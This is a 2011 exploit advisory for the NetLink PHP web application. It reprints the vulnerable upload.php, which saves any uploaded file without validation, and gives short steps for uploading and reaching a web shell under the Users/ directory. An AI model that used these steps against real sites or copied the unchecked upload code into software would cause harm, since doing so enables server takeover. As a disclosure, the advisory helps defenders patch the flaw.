NetLink - Arbitrary File Upload

EDB-ID:

16088

CVE:

N/A


Author:

lumut--

Type:

webapps


Platform:

PHP

Date:

2011-02-01


======================================
NetLink Remote Arbitrary File Upload Vulnerability
Download: http://sourceforge.net/projects/kp-netlink/
by lumut--
Homepage: lumutcherenza.biz
======================================

[upload.php]

<?php
extract($_POST);
if ($submit)
{
  $file_name=$_FILES['filename']['name'];
    $file_type=$_FILES['filename']['type'];
    $file_tmp=$_FILES['filename']['tmp_name'];
    $file_size=$_FILES['filename']['size'];

    $user=$_SESSION['login'];
    echo "Upload Stats:<br/>";
    echo "<blockquote style='font-size:10pt;'>";
    echo "Filename: ".$file_name;
    echo "<br/>File Type: ".$file_type;
    echo "<br/>File Size: ".$file_size;

    #now that the stats have been declared & displayed, now we process and
upload the file
    $file_dest = "Users/$user/";
    $file_dest = $file_dest . $_FILES['filename']['name'];

    echo "<br/><br/>Copying $file_name....";
    echo "<br/>Moving copied file to $user's account...";
    echo "</blockquote>";
    if (move_uploaded_file($_FILES['filename']['tmp_name'], $file_dest))
          print "File '$file_name' was successfully uploaded to account
<b>$user</b>.<br/> ";
    else
    {
      print "Possible file upload attack!  Here's some debugging info:\n";
      print_r($_FILES);
    }
    touch("Users/$user/$file_name");
include("options.php");
echo "<hr color='#000000'/>";
}

?>


expl: http://[target]/[netlink_path]/upload.php
shell: http://[target]/[netlink_path]/Users/yourshell.php

======================================================================

thx to : cr4wl3r, Team_elitE, kisame, aNtI_hAcK, kazuya, PunkRock and
manadocoding team :D
======================================================================